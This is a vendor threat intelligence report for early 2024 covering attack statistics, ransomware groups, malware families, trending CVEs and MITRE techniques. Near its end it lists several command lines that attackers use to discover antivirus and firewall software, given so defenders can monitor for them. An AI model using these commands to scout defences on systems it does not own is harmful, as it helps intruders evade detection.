Actionable Intelligence That Matters
This BlackBerry report provides a comprehensive review of the global threat landscape for the period covering January through March 2024. Report highlights include:
We observed over 630,000 malicious hashes, a per-minute increase of over 40 percent over the previous reporting period.
Read more in the Total Attacks This Period section.
60 percent of all attacks were on critical infrastructure. Of those, 40 percent targeted the financial sector.
Find the details in the Critical Infrastructure section.
56 percent of CVEs were rated 7.0 or higher (with 10 being the most severe). CVEs have been rapidly weaponized in all forms of malware — especially ransomware and infostealers.
Learn more in the Common Vulnerabilities and Exposures section.
New Ransomware Section: We’ve included a new section on the top ransomware groups around the world and the most active ransomware this reporting period.
Learn more in the Who’s Who in Ransomware section.
The BlackBerry® Global Threat Intelligence Reports are published every three months. These frequent updates enable CISOs and other key decision makers to stay informed about the most recent cybersecurity threats and challenges in their industries and geographic locations.
The report is the culmination of the research, analysis, and conclusions of our Cyber Threat Intelligence (CTI) team, our Incident Response (IR) team, and security specialists in our CylanceMDR™ division. Continue scrolling to learn more, download the pdf, or read the executive brief.
Total Attacks This Period
As you will notice in this report, total attacks do not necessarily correlate with the number of unique hashes (new malware). As figures 2 through 6 in the next two sections illustrate, not every attack utilizes unique malware. It depends on the attacker’s motivation, the complexity of the attack, and the goal — e.g., information stealing or financial theft.
BlackBerry cybersecurity solutions stopped over 3,100,000 cyberattacks: this equates to over 37,000 cyberattacks stopped per day.
Attacks By Country
Attacks Stopped
Figure 2 below shows the top five nations where BlackBerry cybersecurity solutions prevented the most cyberattacks. Organizations utilizing BlackBerry solutions in the United States received the most attempted attacks this reporting period. In the Asia-Pacific (APAC) region, Japan, South Korea and Australia also experienced a high level of attacks, earning them spots within our top five. In Latin America (LATAM), customers in Honduras were heavily targeted, earning that country the fifth spot on our list.
Unique Malware
This reporting period, BlackBerry observed over a 40 percent per-minute increase in novel hashes (unique malware), compared to the September through December 2023 period (Figure 1). Figure 2 shows the five countries where BlackBerry cybersecurity solutions recorded the highest number of unique malware hashes, with the United States receiving the greatest number. South Korea, Japan, and Australia in the Asia-Pacific region retained their rankings from the last three-month period, while Brazil joins the list as a new entry.
As we'll see in the next sections, other attackers may want to damage physical infrastructure, such as a public utility, by exploiting a vulnerability in the control systems or by infecting a device on the network
Attacks By Industry
As in our previous report, we have consolidated several key industry sectors under two umbrella sections: Critical Infrastructure and Commercial Enterprise.
Critical infrastructure, as defined by the Cybersecurity and Infrastructure Security Agency (CISA), encompasses 16 sectors including healthcare, government, energy, agriculture, finance and defense.
The increasing digitization of these sectors means their assets are more vulnerable to cybercriminals. Threat actors actively exploit critical systems via vulnerabilities such as system misconfigurations and social engineering campaigns against employees.
Commercial enterprises include manufacturing, capital goods, commercial and professional services, and retail. Businesses are always tempting targets for cyberattacks, and the increased use of connected devices and cloud computing has made it easier to breach their systems. Attackers have also become more sophisticated, often using social engineering to obtain account credentials and distribute malware.
Cyber Story Highlight: International Banks
Mexican Banks and Cryptocurrency Platforms Targeted with AllaKore RAT
In January, BlackBerry cyberthreat analysts uncovered a long-running, financially motivated campaign targeting Mexican banks and cryptocurrency trading platforms with the AllaKore RAT, a modified open-source remote access tool. The threat actors used lures mimicking the Mexican Social Security Institute (IMSS) and legitimate documents to distract users during the installation process, allowing them to steal banking credentials and authentication information. This campaign has been ongoing since 2021, focusing on large Mexican companies with revenues exceeding $100 million. BlackBerry's findings suggest that the threat actor is likely based in Latin America, given the use of Mexico Starlink IPs and Spanish-language instructions in the RAT payload. Read the full article on our blog to learn more.
Critical Infrastructure Threats
Based on our internal telemetry, of those cyberattacks that BlackBerry cybersecurity solutions encountered that were industry-specific, 60 percent were targeted against critical infrastructure. Additionally, 32 percent of unique malware hashes targeted critical infrastructure tenants.
CylanceENDPOINT™ and other BlackBerry cybersecurity solutions stopped over 1.1 million attacks against critical industry sectors, which include finance, healthcare, government and utilities. Almost half of these 1.1 million attacks were in the finance sector. Additionally, government and public sector organizations experienced the greatest diversity of attacks, with over 36 percent of unique hashes targeting this sector.
BlackBerry telemetry recorded several prevalent malware families targeting critical infrastructure around the globe. For instance, the notorious infostealer LummaStealer was observed specifically targeting the food and agriculture industries in Latin America and the energy sector in the APAC region. Notable threats observed during this reporting period included:
- 8Base ransomware: Ransomware operation | Healthcare sector
- Amadey (Amadey Bot): Multifunctional botnet | Government facilities
- Buhti: Ransomware operation | Commercial real estate
- LummaStealer (LummaC2): C-based infostealer | Food and agriculture sector (LATAM) and energy sector (APAC)
- PrivateLoader: Downloader family | Energy sector
- Remcos (RemcosRAT): Commercial-grade remote access tool (RAT) | Food and agriculture sector
- Vidar (VidarStealer): Commodity infostealer | Various sectors:
- The energy sector in APAC countries
- The IT sector in LATAM countries
- The financial services sector in North America
- The government facilities sector in Europe, the Middle East and Africa (EMEA)
Details on these threats to critical infrastructure are available in the Appendix.
External Threats Faced by Critical Infrastructure
External threats are cyberattacks recorded outside of BlackBerry’s internal telemetry. During this last reporting period, the broader global threat landscape saw a number of notable attacks against critical infrastructure.
Ramifications continue from the late 2023 breach at the U.S.-based Idaho National Laboratory (INL), a research facility for the U.S. Department of Energy (DOE). Attackers breached the laboratory's cloud-based HR management platform Oracle HCM and siphoned the personal data of over 45,000 people. The hacktivist group SiegedSec claimed responsibility for the attack in the weeks following and posted a portion of the stolen data on an online leak forum. Figure 7 provides a timeline of notable threats against critical infrastructure that occurred during this reporting period.
Cyber Story Highlight: Infrastructure, VPNs, and Zero Trust
Emergency Directive Reveals It May Be Time to Replace VPNs
The core functionality of virtual private networks (VPNs) has remained largely unchanged since their inception in 1996, but recent high-profile security breaches and government directives suggest it may be time to reconsider their use.
A key issue is VPNs' "trust but verify" model, which inherently grants trust to users within the network perimeter, making them vulnerable to cyberattacks. Highlighting this risk, the Cybersecurity and Infrastructure Security Agency (CISA) recently issued emergency directives addressing critical VPN vulnerabilities, urging rapid disconnection of at-risk products. Read the full story on our blog.
Commercial Enterprise Threats
Just as industries are impacted by cybersecurity threats, individual companies also battle cyberattacks, especially as they tend to rely more on digital infrastructure for finance, communications, sales, procurement and other business operations. Everything from start-ups to multinational conglomerates are susceptible to cyberthreats, particularly ransomware.
Throughout the last reporting period, BlackBerry cybersecurity solutions blocked 700,000 attacks targeting industries within the commercial enterprise sector.
Based upon our internal telemetry, compared to the previous reporting period, commercial enterprises saw:
- a two percent increase in the number of attacks they faced.
- a 10 percent jump in unique hashes encountered.
Commercial enterprises face threats from infostealers sold via malware as a service (MaaS) operations. Often, these threats deploy additional malware onto a victim’s device. They continue to evolve in a cyber arms race to circumvent security products and traditional antivirus (AV) software. The prevalent malware noted in BlackBerry telemetry includes:
- RedLine (RedLine Stealer): Infostealer
- SmokeLoader: Commonly utilized and versatile malware
- PrivateLoader: Malware facilitator
- RaccoonStealer: MaaS infostealer
- LummaStealer (LummaC2): Malware infostealer
Details on these threats to commercial enterprises are available in the Appendix.
External Threats Faced by Commercial Enterprise
Ransomware is a prevalent scourge against organizations of all sizes and business orientations. Recent examples of ransomware attacks include:
- VF Corporation — a U.S. manufacturer of well-known sportswear brands such as Timberland, The North Face, and Vans — was the victim of a ransomware attack by the ALPHV ransomware gang in December 2023. The attackers stole the data of over 35 million customers, causing delays in order fulfilment and other disruptions during the all-important holiday season.
- Coop Värmland, a Swedish supermarket chain, had its busy holiday period disrupted by a ransomware attack perpetrated by the Cactus ransomware gang.
- A well-known German manufacturer, ThyssenKrupp, suffered a breach in its automotive subdivision in February 2024. The company later said the attack was a failed ransomware attack.
- In March, the Stormous ransomware group attacked the Belgian Duvel Moortgat Brewery, a producer of over 20 brands of beer, and stole 88 GB of data.
Who’s Who in Ransomware
As the above events highlight, ransomware has been a prevalent threat across the BlackBerry Global Threat Intelligence Report. For this report, we’ve introduced a section specifically about ransomware groups active in this reporting period.
Ransomware is a universal tool adopted by cyber-criminals and organized syndicates alike, targeting victims in all industries around the globe. Most of these groups are financially motivated; they quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.
Ransomware is increasingly targeting healthcare organizations, a concerning trend. Healthcare is a profitable sector for ransomware groups due to the increasing digitization of healthcare records and the severe consequences that can occur if these services are disrupted. With notable attacks happening globally during this reporting period, these aggressive syndicates can endanger lives and restrict or cut off healthcare workers’ access to patients' crucial personal identifiable information (PII) data.
Attacks on healthcare can have serious knock-on effects, crippling hospitals, clinics, pharmacies and drug dispensaries; preventing patients from obtaining vital medications; causing ambulances to be re-routed; and disrupting the scheduling of medical procedures. Secondary impacts include data leakage and sensitive patient PII being sold on the dark web. For this reason, we predict healthcare will continue to be heavily targeted both publicly and privately throughout 2024.
Key Ransomware Players This Reporting Period
Following are notable ransomware threat groups from around the globe who were active this reporting period:
Hunters International
Hunters International, a ransomware as a service (RaaS) crime syndicate that’s been in operation since late 2023, rose to prominence in early 2024. The group is possibly a spin-off of the Hive ransomware group, which was shuttered by law enforcement in early 2023. This group employs a double extortion scheme that involves first encrypting the victim’s data for ransom, then demanding more money by threatening to publicly post the stolen data. Hunters International is currently active around the globe.
8Base
Initially observed in 2022, the 8Base ransomware group rose to prominence in late 2023. This prolific group uses a variety of tactics, techniques and procedures (TTPs) and can be highly opportunistic. The group is often quick to exploit newly disclosed vulnerabilities and leverages various ransomware, including Phobos.
LockBit
LockBit, a Russia-based ransomware group, specializes in providing RaaS through its eponymous malware. Discovered in 2020, LockBit ransomware has become one of the most aggressive ransomware groups. Aspects include:
- Custom tooling to exfiltrate victim data prior to encryption and host it via a leak site on the dark web.
- Largely targets victims in North American and, secondarily, in LATAM.
- Employs a double extortion strategy.
In February 2024, Operation Cronos, an international law enforcement effort, disrupted LockBit’s operations. However, LockBit appears to have since bounced back, and remains a major player in the ransomware space.
Play
Observed initially in 2022, Play is a multi-extortion ransomware group that hosts stolen data on TOR-based sites that enable anonymous communication, threatening that the data will be leaked if the ransom payment isn’t made. Play often targets small and medium businesses (SMBs), mainly in North America, but also in the EMEA region during this reporting period. The group largely leverages off-the-shelf tools like Cobalt Strike, Empire and Mimikatz for discovery and lateral movement TTPs. The group also utilized Grixba, a custom recon and infostealing tool that is used prior to ransomware execution.
BianLian
BianLian is a GoLang-based ransomware that has been in the wild since 2022. The associated group has been active this reporting period, heavily targeting victims based in North America. Like many ransomware groups, BianLian is highly exploitive of recently disclosed vulnerabilities, often targeting smaller companies across a number of industries. It uses various off-the-shelf tools including PingCastle, Advance Port Scanner and SharpShares to gain a foothold on a target system before exfiltrating sensitive data and executing ransomware. This stolen data is then leveraged as an extortion tactic until the ransom is paid.
ALPHV
Often referred to as BlackCat or Noberus, ALPHV is a RaaS operation that has been around since late 2021. The threat group behind ALPHV is highly sophisticated, leveraging the Rust programing language to target Windows, Linux and VMWare-based operating systems. ALPHV tends to target North American victims.
Ransomware groups...quickly adapt new tactics and techniques to evade traditional cybersecurity defenses and will rapidly exploit any new security vulnerabilities.
Cyber Story Highlight: Ransomware and Healthcare
12 Days Without Revenue: Ransomware Fallout Continues in Healthcare Sector
In March, the healthcare sector experienced an "unprecedented" ransomware attack that disrupted operations across hospitals and pharmacies, according to the American Hospital Association (AHA). The attack on Change Healthcare, which processes 15 billion health care transactions annually, severely affected patient care services such as clinical decision support and pharmacy operations. This disruption led to a 12-day revenue standstill for impacted medical practices and left patients struggling to access vital prescriptions. With the U.S. Department of Health and Human Services’ Office for Civil Rights now investigating, the latest data reveals a significant rise in cyber-threats, with a 256% increase in large hacking breaches over the past five years. The incident underscores the critical need for enhanced cybersecurity measures in the healthcare industry. For a detailed exploration of this pressing issue, read the full story on our blog.
Geopolitical Analysis and Comments
Geopolitical conflicts increasingly drive cyberattacks. Digital technologies can be powerful tools for good, but they can also be abused by state and non-state actors. In the first three months of 2024, lawmakers across Europe, North America and the Asia-Pacific region fell victim to targeted spyware campaigns. Threat actors broke into the IT systems of multiple government departments, compromised military systems, and disrupted critical infrastructure around the world.
While the motives driving these intrusions are often complex and opaque, the most significant, recent incidents involved major geopolitical divides such as Russia’s invasion of Ukraine, mounting aggression between Israel and Iran, and ongoing tensions in the South China Sea and the Indo-Pacific region.
In Ukraine, the cyber dimensions of the war continue to grind on. Contrary to international norms governing lawful conduct in cyberspace, attacks launched against Ukraine continue to fail to distinguish between civilian and military infrastructure. In January, Russian agents tapped into residential webcams in Kyiv allegedly to gather information on the city’s air defense systems before launching a missile attack on the city. Per reports, the attackers manipulated camera angles to gather information on nearby critical infrastructure for more precise missile targeting.
Russian cyberthreat actors were also linked to an attack against Ukraine’s largest mobile phone provider, Kyivstar, destroying significant infrastructure and cutting off access to 24 million customers in Ukraine. This attack came just hours before President Biden met with President Zelenskyy in Washington D.C. Lawmakers in the EU also discovered that their phones had been infected with spyware. Many of these lawmakers were members of the European Parliament’s security and defense subcommittee, responsible for making recommendations on EU support to Ukraine. In March, Russian attackers also intercepted conversations between German military officials about potential military support to Ukraine, reinforcing the need to protect communications from increased espionage attempts.
As military activity between Iran and Israel has escalated, so have cyberattacks against Israeli government sites. In retaliation, Israeli threat actors disrupted 70 percent of gas stations across Iran. Meanwhile, the U.S. launched a cyberattack against an Iranian military spy ship in the Red Sea that was sharing intelligence with Houthi rebels.
In the Indo-Pacific region, cyberattacks and espionage campaigns attributed to Chinese-backed groups continued to mount. The U.S. Department of Homeland Security’s Cyber Safety Review Board released a major report about the Microsoft Online Exchange Incident from the summer of 2023 and documented in detail how Chinese-backed attackers stole source code from Microsoft. The threat group Storm-0558 compromised employees and officials in the U.S. Department of State, the U.S. Department of Commerce, the U.S. House of Representatives, and several government departments in the UK. According to the report, the threat actor managed to download approximately 60,000 emails from the State Department alone.
This was not an isolated incident. In March 2024, the U.S. Department of Justice and the FBI revealed that Chinese attackers had targeted several UK, EU, U.S. and Canadian members of the Interparliamentary Alliance on China.
As noted earlier, attacks against critical infrastructure have risen, particularly in the financial and healthcare sectors. In the first three months of 2024, a massive data breach of a French health insurance company led to the leak of sensitive personal information. In Canada, the Financial Transactions and Reports Analysis Center (FINTRAC) shut down its systems after a cyber incident. In response, the Canadian government allocated CAN$27 million to enhance FINTRAC’s cyber resiliency and construct data security safeguards.
Governments around the world are investing in stronger cybersecurity in the face of increased cyber espionage and cyberattack attempts. Canada recently announced historic levels of investment in its cyber defenses, and the UK increased its defense spending to 2.5 percent of GDP. Cybersecurity remains one of the top risks for governments and private sector actors alike, and this trend will likely continue so long as geopolitical tensions continue to rise.
Incident Response Observations
Observations of the BlackBerry Incident Response Team
This is a summary of the types of IR engagements the BlackBerry team responded to, as well as security measures organizations can take to prevent such breaches.
- Network Intrusion: Incidents in which the initial infection vector was a vulnerable, Internet-facing system, such as a web server or a virtual private network (VPN) appliance. In some cases, the breach led to the deployment of ransomware within the target's environment and the exfiltration of data.
- Prevention: Apply security updates to all Internet-exposed systems in a timely manner. (MITRE – External Remote Services, T1133.)
- Insider Misconduct: A current and/or former employee accessed company resources without authorization.
- Prevention: Implement strong authentication security controls on all systems. Implement formal company employee offboarding procedures. (MITRE – Valid Accounts: Cloud Accounts, T1078.004.)
- Ransomware: Ten percent of all incidents responded to were ransomware-based.
- Prevention: Patch Internet-facing services such as email, VPNs, and web servers in a timely fashion. This can prevent a threat actor from accessing and further actioning on objectives, such as deploying ransomware, after gaining access to an enterprise network via a vulnerable device or system. (MITRE – External Remote Services, T1133.)
- Prevention: Ensure the organization has two copies of all critical data stored in two different media formats from the original data source, with at least one copy off-site.
Detecting, containing and recovering from a cybersecurity incident requires rapid detection and response to limit damage. It is imperative that organizations have a well-documented incident response plan in place, along with trained personnel and resources ready to take immediate action at the first signs of a potential breach. This ensures that security teams can detect issues as early as possible, quickly contain and eradicate threats, and mitigate business and brand reputation impacts, monetary losses, and legal risks to the organization.
Threat Actors and Tooling
Threat Actors
Dozens of threat groups mounted cyberattacks in the first three months of 2024. We have highlighted the most impactful attacks here.
LockBit
In February, the NCA, the FBI, and Europol, through a coordinated global effort named “Operation Cronos,” collaborated with law enforcement agencies across 10 countries to take control of the LockBit group’s infrastructure and leak site, gather information from their servers, make arrests, and impose sanctions.
However, less than one week later, the ransomware group regrouped and resumed its attacks, employing updated encryptors and ransom notes that direct victims to new servers following the law enforcement disruption.
LockBit claimed responsibility for cyberattacks against various networks, including the Capital Health hospital network. In both instances, they threatened to release confidential data unless prompt ransom payments were made.
Rhysida
APT29
CISA recently warned that APT29 has expanded its targeting to include additional industries and more local governments. Known to use a wide range of custom malware, the threat group has also recently targeted cloud services using compromised service accounts or stolen authentication tokens.
In this reporting period, APT29 was observed accessing a Microsoft test tenant account following a password spray attack, then creating malicious OAuth applications to access corporate email accounts. Furthermore, they targeted German political parties with WINELOADER, a backdoor first observed in January 2024.
Akira
Akira has been known to use tools such as:
- AdFind for querying Active Directory.
- Mimikatz and LaZagne for accessing credentials.
- Ngrok for tunneling into networks behind firewalls or other security measures.
- AnyDesk for remote access.
- Advanced IP Scanner for locating devices on a network.
Key Tools Used by Threat Actors
Mimikatz
Cobalt Strike
Ngrok
ConnectWise
Prevalent Threats by Platform: Windows
Remcos
Remote Access Trojan
Remcos, short for Remote Control and Surveillance, is an application used to remotely access a victim’s device.
Agent Tesla
Infostealer
Agent Tesla is a .NET based Trojan that is often seen sold as a MaaS and is used primarily for credential harvesting.
RedLine
Infostealer
RedLine malware utilizes a wide range of applications and services to illicitly exfiltrate victims’ data, such as credit card information, passwords, and cookies.
RisePro
Infostealer
While updated variations of RisePro were observed in our last report, the infostealer was seen in a new campaign being falsely distributed as “cracked software” on GitHub repositories during this reporting period.
SmokeLoader
Backdoor
SmokeLoader is a modular malware used to download other payloads and steal information. It was originally observed in 2011 but remains an active threat to this day.
Prometei
Cryptocurrency Miner/Botnet
Prometei is a multi-stage cross-platform cryptocurrency botnet primarily targeting Monero coins. It can adjust its payload to target either Linux or Windows platforms. Prometei has been seen used alongside Mimikatz to spread to as many endpoints as possible.
Buhti
Ransomware
Buhti is a ransomware operation that utilizes existing variations of other malware such as LockBit or Babuk to target Linux and Windows systems.
Prevalent Threats by Platform: Linux
XMRig
Cryptocurrency Miner
XMRig continues to be prevalent during this reporting period. The miner targets Monero while enabling the threat actor to use a victim’s system to mine cryptocurrency without their knowledge.
NoaBot/Mirai
Distributed Denial of Service (DDoS)
NoaBot is a slightly more sophisticated Mirai variant. It boasts improved obfuscation techniques compared to Mirai and uses SSH to spread as opposed to Telnet. It is also compiled with uClibc instead of GCC, making detection difficult.NoaBot/Mirai
XorDDoS
DDoS
Frequently observed in our telemetry, XorDDoS is a Trojan malware that targets Internet-facing devices running Linux and coordinates infected botnets via C2 instructions. It gets its name from using XOR encryption to control access to execution and communication data.
AcidPour
Wiper
Although not present in our own telemetry, a new version of the data wiper AcidPour has been seen in the wild. The latest version of the malware, which is utilized to wipe files on routers and modems, is designed to specifically target Linux x86 devices.
Prevalent Threats by Platform: MacOS
RustDoor
Backdoor
RustDoor is a Rust-based backdoor malware which is primarily distributed by being disguised as updates for legitimate programs. The malware spreads as FAT binaries containing Mach-o files.
Atomic Stealer
Infostealer
Atomic Stealer (AMOS) remains prevalent with a new version spotted in the wild. The latest version of the stealer drops a Python script to aid in remaining undetected. AMOS targets passwords, browser cookies, autofill data, crypto wallets and Mac keychain data.
Empire Transfer
Infostealer
An infostealer discovered by Moonlock Lab in February 2024. It can “self-destruct” when it detects that it is running in a virtual environment. This helps the malware remain undetected and makes analysis more difficult for defenders. Empire Transfer targets passwords, browser cookies and crypto wallets, and utilizes similar tactics to Atomic Stealer (AMOS).
Prevalent Threats by Platform: Android
SpyNote
Infostealer/RAT
SpyNote utilizes the Android Accessibility Service to capture user data and send captured data to a C2 server.
Anatsa/Teabot
Infostealer
Primarily distributed through the Google Play store as Trojan applications. After initial infection from the Trojan application, Anatsa downloads additional malicious files to the victim’s device from a C2 server.
Vultur
Infostealer/RAT
First discovered in 2021, Vultur has been distributed through Trojan applications and “smishing” (SMS phishing) social engineering techniques. In addition to data exfiltration, a threat actor can also make changes to the file system, modify execution permissions, and control the infected device using Android Accessibility Services.
Coper/Octo
Infostealer/RAT
A variant of the Exobot family. Packaged as a MaaS product, its capabilities include keylogging, SMS monitoring, screen control, remote access and C2 operation.
Common Vulnerabilities and Exposures
Common Vulnerabilities and Exposures (CVEs) provide a framework for identifying, standardizing and publicizing known security vulnerabilities and exposures. As mentioned earlier, cyber criminals are increasingly using CVEs to breach systems and steal data. This reporting period, new vulnerabilities found within Ivanti, ConnectWise, Fortra and Jenkins products offered bad actors new ways to target victims. In addition, the last few months have demonstrated the risks of supply chain attacks that could be present in open-source projects with the XZ backdoor, which had been intentionally planted in XZ Utils, a data compression utility available on almost all installations of Linux.
Almost 8,900 new CVEs were reported by the National Institute of Standards and Technology (NIST) from January through March. The base score is composed of carefully calculated metrics which can be used to calculate a severity score of zero to 10. The dominant CVE base score was a “7,” which accounted for 26 percent of the total scores. This is an increase of three percent for this CVE score compared to the last reporting period. March holds the record so far this year for the most newly discovered CVEs, with close to 3,350 new CVEs. The Trending CVEs table references specific vulnerabilities listed in the NIST National Vulnerability Database.
Trending CVEs
XZ Utils Backdoor
CVE-2024-3094 (10 Critical)
Unauthorized Access
This malicious code was embedded in XZ Utils version 5.6.0 and 5.6.1. The backdoor manipulated sshd, which would grant unauthenticated attackers unauthorized access to affected Linux distributions.
Ivanti Zero-Day Vulnerabilities
CVE-2024-21887 (9.1 Critical); CVE-2023-46805 (8.2 High); CVE-2024-21888 (8.8 High); CVE-2024-21893 (8.2 High)
Arbitrary Code Execution
Early this year, authentication bypass and command injection vulnerabilities were found within Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) products. If both were used in conjunction by a threat actor, this would allow them to craft malicious requests and to execute arbitrary commands on the system.
In January, Ivanti also warned about two more vulnerabilities affecting the products, CVE-2024-21888 (a privilege escalation vulnerability) and CVE-2024-21893 (a server-side request forgery vulnerability). Nation-state actors have exploited these zero-day vulnerabilities to deploy custom malware strains.
Windows SmartScreen Bypass
CVE-2024-21412 (8.1 High)
Security Bypass
This is an Internet shortcut file security feature bypass that affects Microsoft Windows Internet shortcut files. It requires user interaction to bypass the security checks. Upon initial interaction, it causes a series of executions ultimately leading the victim to a malicious script. This zero-day vulnerability was used to deploy the DarkMe RAT by a threat group.
Windows Kernel Elevation Vulnerability
CVE-2024-21338 (7.8 High)
Elevation of Privilege
Exploiting this vulnerability allows the attacker to gain system privileges. The Lazarus Group (a North Korean threat group) exploited this zero-day vulnerability found within Windows AppLocker driver (appid.sys) to gain kernel-level access.
Fortra’s GoAnywhere MFT Exploit
CVE-2024-0204 (9.8 Critical)
Authentication Bypass
In January, Fortra published a security advisory sharing the critical bypass affecting a GoAnywhere MFT product. This vulnerability was found within Fortra's GoAnywhere MFT prior to 7.4.1. Exploitation allows an unauthorized user to create an admin user via the administration portal.
Jenkins Arbitrary File Read Vulnerability
CVE-2024-23897 (9.7 Critical)
Remote Code Execution
Prior versions of Jenkins — up to 2.441 and earlier, LTS 2.426.2 — contain a vulnerability found on the Jenkins controller file system via the built-in command line interface. It is found within args4j library, which has a feature that replaces an “@” character followed by a file path in an argument with the file’s contents.34 This, in turn, allows an attacker to read arbitrary files on the file system, and could potentially lead to remote code execution.
ConnectWise ScreenConnect 23.9.7 Vulnerability
CVE-2024-1709 (10 Critical); CVE-2024-1708 (8.4 High)
Remote Code Execution
This vulnerability affects the ConnectWise ScreenConnect 23.9.7 product. Attackers have been seen to leverage both of these vulnerabilities in the wild. Both work in conjunction with each other where CVE-2024-1709 (a critical authentication bypass vulnerability) allows the attacker to create administrative accounts and exploit CVE-2024-1708 (a path traversal vulnerability), allowing unauthorized access to the victim’s files and directories.
Common MITRE Techniques
Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following Top 20 techniques being used by threat actors in this reporting period.
An upward arrow in the last column indicates that usage of the technique has increased since our last report; a downward arrow indicates that usage has decreased, and an equals (=) symbol means that the technique remains in the same position as in our last report.
Technique Name | Technique ID | Tactic Name | Last Report | Change |
---|---|---|---|---|
Process Injection
|
T1055
|
Privilege Escalation, Defense Evasion
|
1
|
=
|
System Information Discovery
|
T1082
|
Discovery
|
3
|
↑
|
DLL Side-Loading
|
T1574.002
|
Persistence, Privilege Escalation, Defense Evasion
|
4
|
↑
|
Input Capture
|
T1056
|
Credential Access, Collection
|
2
|
↓
|
Security Software Discovery
|
T1518.001
|
Discovery
|
NA
|
↑
|
Masquerading
|
T1036
|
Defense Evasion
|
10
|
↑
|
File and Directory Discovery
|
T1083
|
Discovery
|
13
|
↑
|
Process Discovery
|
T1057
|
Discovery
|
19
|
↑
|
Application Layer Protocol
|
T1071
|
Command-and-control
|
6
|
↓
|
Registry Run Keys/Startup Folder
|
T1547.001
|
Persistence, Privilege Escalation
|
9
|
↓
|
Non-Application Layer Protocol
|
T1095
|
Command-and-control
|
5
|
↓
|
Remote System Discovery
|
T1018
|
Discovery
|
15
|
↑
|
Application Window Discovery
|
T1010
|
Discovery
|
NA
|
↑
|
Software Packing
|
T1027.002
|
Defense Evasion
|
NA
|
↑
|
Scheduled Task/Job
|
T1053
|
Execution, Persistence, Privilege Escalation
|
8
|
↓
|
Windows Service
|
T1543.003
|
Persistence, Privilege Escalation
|
12
|
↓
|
Disable or Modify Tools
|
T1562.001
|
Defense Evasion
|
18
|
↑
|
Command and Scripting Interpreter
|
T1059
|
Execution
|
7
|
↓
|
Obfuscated Files or Information
|
T1027
|
Defense Evasion
|
NA
|
↑
|
Replication Through Removable Media
|
T1091
|
Initial Access, Lateral Movement
|
11
|
↓
|
Technique ID | |
---|---|
Process Injection |
T1055
|
System Information Discovery |
T1082
|
DLL Side-Loading |
T1574.002
|
Input Capture |
T1056
|
Security Software Discovery |
T1518.001
|
Masquerading |
T1036
|
File and Directory Discovery |
T1083
|
Process Discovery |
T1057
|
Application Layer Protocol |
T1071
|
Registry Run Keys/Startup Folder |
T1547.001
|
Non-Application Layer Protocol |
T1095
|
Remote System Discovery |
T1018
|
Application Window Discovery |
T1010
|
Software Packing |
T1027.002
|
Scheduled Task/Job |
T1053
|
Windows Service |
T1543.003
|
Disable or Modify Tools |
T1562.001
|
Command and Scripting Interpreter |
T1059
|
Obfuscated Files or Information |
T1027
|
Replication Through Removable Media |
T1091
|
Tactic Name | |
---|---|
Process Injection |
Privilege Escalation, Defense Evasion
|
System Information Discovery |
Discovery
|
DLL Side-Loading |
Persistence, Privilege Escalation, Defense Evasion
|
Input Capture |
Credential Access, Collection
|
Security Software Discovery |
Discovery
|
Masquerading |
Defense Evasion
|
File and Directory Discovery |
Discovery
|
Process Discovery |
Discovery
|
Application Layer Protocol |
Command-and-control
|
Registry Run Keys/Startup Folder |
Persistence, Privilege Escalation
|
Non-Application Layer Protocol |
Command-and-control
|
Remote System Discovery |
Discovery
|
Application Window Discovery |
Discovery
|
Software Packing |
Defense Evasion
|
Scheduled Task/Job |
Execution, Persistence, Privilege Escalation
|
Windows Service |
Persistence, Privilege Escalation
|
Disable or Modify Tools |
Defense Evasion
|
Command and Scripting Interpreter |
Execution
|
Obfuscated Files or Information |
Defense Evasion
|
Replication Through Removable Media |
Initial Access, Lateral Movement
|
Last Report | |
---|---|
Process Injection |
1
|
System Information Discovery |
3
|
DLL Side-Loading |
4
|
Input Capture |
2
|
Security Software Discovery |
NA
|
Masquerading |
10
|
File and Directory Discovery |
13
|
Process Discovery |
19
|
Application Layer Protocol |
6
|
Registry Run Keys/Startup Folder |
9
|
Non-Application Layer Protocol |
5
|
Remote System Discovery |
15
|
Application Window Discovery |
NA
|
Software Packing |
NA
|
Scheduled Task/Job |
8
|
Windows Service |
12
|
Disable or Modify Tools |
18
|
Command and Scripting Interpreter |
7
|
Obfuscated Files or Information |
NA
|
Replication Through Removable Media |
11
|
Change | |
---|---|
Process Injection |
=
|
System Information Discovery |
↑
|
DLL Side-Loading |
↑
|
Input Capture |
↓
|
Security Software Discovery |
↑
|
Masquerading |
↑
|
File and Directory Discovery |
↑
|
Process Discovery |
↑
|
Application Layer Protocol |
↓
|
Registry Run Keys/Startup Folder |
↓
|
Non-Application Layer Protocol |
↓
|
Remote System Discovery |
↑
|
Application Window Discovery |
↑
|
Software Packing |
↑
|
Scheduled Task/Job |
↓
|
Windows Service |
↓
|
Disable or Modify Tools |
↑
|
Command and Scripting Interpreter |
↓
|
Obfuscated Files or Information |
↑
|
Replication Through Removable Media |
↓
|
Using MITRE D3FEND™, the BlackBerry Threat Research and Intelligence team developed a complete list of countermeasures for the techniques observed during this reporting period, which is available in our public GitHub.
The top three techniques are well-known procedures used by adversaries to gather key information to conduct successful attacks. The Applied Countermeasures section contains some examples of their usage and some useful information to monitor.
The impact of the total of techniques and tactics can be seen in the graph below:
The most prevalent Tactic this reporting period is Defense Evasion, making up 24 percent of the total of tactics observed during this reported period, followed by Discovery at 23 percent, and Privilege Escalation at 21 percent.
Applied Countermeasures for Noted MITRE Techniques
-
Security Software Discovery – T1518.001
This popular technique allows cyberthreat actors to find the list of installed security programs, configurations and sensors on a targeted system or cloud environment. This is very important for an adversary who hopes to stay undetected. For example, if a malicious group runs one of the commands listed below on a compromised system and detects that the environment already has security to spot malicious activity, they will often abort the operation. In other cases, more advanced and persistent groups can differentiate between security applications and find a way to work around the weaker applications. This can result in an adversary gaining control of a system or cloud environment.
Below are command lines that an attacker might use to evaluate your security:
- netsh firewall show
- netsh.exe interface dump
- findstr /s /m /i "defender" *.*
- Tasklist /v
- Powershell Empire Module Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-
Masquerading – T1036
